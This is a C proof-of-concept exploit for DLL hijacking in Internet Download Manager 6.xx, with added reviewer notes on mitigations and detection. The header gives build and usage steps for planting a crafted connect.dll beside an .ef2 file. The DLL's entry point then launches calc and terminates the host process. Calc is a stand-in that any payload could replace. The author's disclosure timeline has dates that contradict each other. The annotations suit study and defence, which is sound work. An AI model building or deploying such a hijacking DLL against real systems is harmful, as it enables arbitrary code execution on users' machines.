/*
 * Exploit Title  : Internet Download Manager 6.XX DLL Hijacking
 * Author         : TUNISIAN CYBER
 * Date           : 30-03-2015
 * Type           : Local Exploits
 * Vendor         : http://www.internetdownloadmanager.com/
 * Tested on      : WinXp
 * Friendly Sites : sec4ever.com
 * Twitter        : @TCYB3R
 * POC IMG        : http://i.imgur.com/qfkEFR8.png (VNCInject)
 *
 * Build : gcc -shared -o connect.dll dllhijack.c
 * Usage : create .ef2 file and put it with connect.dll in the same dir.
 *         calc.exe will popup
 *
 * Proof of Concept (PoC):
 *
 * Timeline (dates reproduced exactly as the author gave them; they are
 * not mutually consistent):
 *   07/04/2015: Vulnerability was discovered.
 *   09/04/2015: Contact with vendor.
 *   10/04/2015: No reply.
 *   11/04/2015: Vendor Refused to patch the vulnerability.
 *   2014-15-03: Vulnerability Published
 *
 * Reviewer notes (defensive reading of this listing):
 *   - The usage line implies the application resolves "connect.dll" from
 *     the directory that holds the opened .ef2 file. The listing does not
 *     show which load call is responsible.
 *   - Application-side fixes for this class of bug: load libraries by
 *     fully qualified path, or restrict the search path with
 *     SetDefaultDllDirectories() / LoadLibraryEx() LOAD_LIBRARY_SEARCH_*
 *     flags, or call SetDllDirectory("") to drop the current directory
 *     from the search order.
 *   - Host-side hardening: the CWDIllegalInDllSearch registry setting
 *     removes the current working directory from the DLL search order.
 *   - Detection: image-load telemetry showing connect.dll mapped into the
 *     download manager from a path outside its install directory.
 */

#include <windows.h>

/*
 * Demonstration payload: starts "calc" and then ends the host process.
 *
 * WinExec's second argument is the show-window value; SW_HIDE is the
 * named constant for the literal 0 the original passes.
 *
 * NOTE(review): exit() is called with no <stdlib.h> include in this file,
 * so whether a declaration is visible depends on what <windows.h> pulls
 * in for the toolchain in use.
 */
int tunisian()
{
    WinExec("calc", SW_HIDE);

    /* Terminates the process that loaded the DLL; nothing below runs. */
    exit(0);

    return 0;
}

/*
 * DLL entry point, invoked by the Windows loader.
 *
 * The notification reason is not inspected, so the payload is called on
 * whichever notification arrives first. Because tunisian() exits the
 * process, the FALSE return is never reached in practice.
 */
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    /* None of the loader-supplied arguments are used. */
    (void)hinstDLL;
    (void)fdwReason;
    (void)lpvReserved;

    (void)tunisian();

    return FALSE;
}